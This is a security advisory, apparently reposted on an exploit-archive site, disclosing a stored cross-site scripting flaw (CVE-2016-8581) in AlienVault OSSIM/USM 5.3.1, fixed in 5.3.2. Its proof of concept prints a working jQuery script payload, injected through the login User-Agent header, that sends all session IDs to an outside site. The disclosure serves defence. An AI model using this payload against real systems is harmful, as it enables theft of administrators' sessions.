Alienvault OSSIM/USM 5.3.1 Persistent Cross Site Scripting

2016.11.02
Credit: Peter Lapp
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2016-8581
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Details ======= Product: Alienvault OSSIM/USM Vulnerability: Stored XSS Author: Peter Lapp, lappsec () gmail com CVE: CVE-2016-8581 CVSS: 3.5 Vulnerable Versions: <=5.3.1 Fixed Version: 5.3.2 Vulnerability Details ===================== A stored XSS vulnerability exists in the User-Agent header of the login process. It's possible to inject a script into that header that then gets executed when mousing over the User-Agent field in Settings -> Current Sessions. POC === The POC uses jQuery to send all session IDs on the "Current Sessions" page to an arbitrary site (Google, in this case) <script>$('#ops_table .ops_id').each(function(){$.get("https://www.google.com/",{session:($(this).html())});});</script> Timeline ======== 08/03/16 - Reported to Vendor 10/03/16 - Fixed in version 5.3.2 References ========== https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities

References:

https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top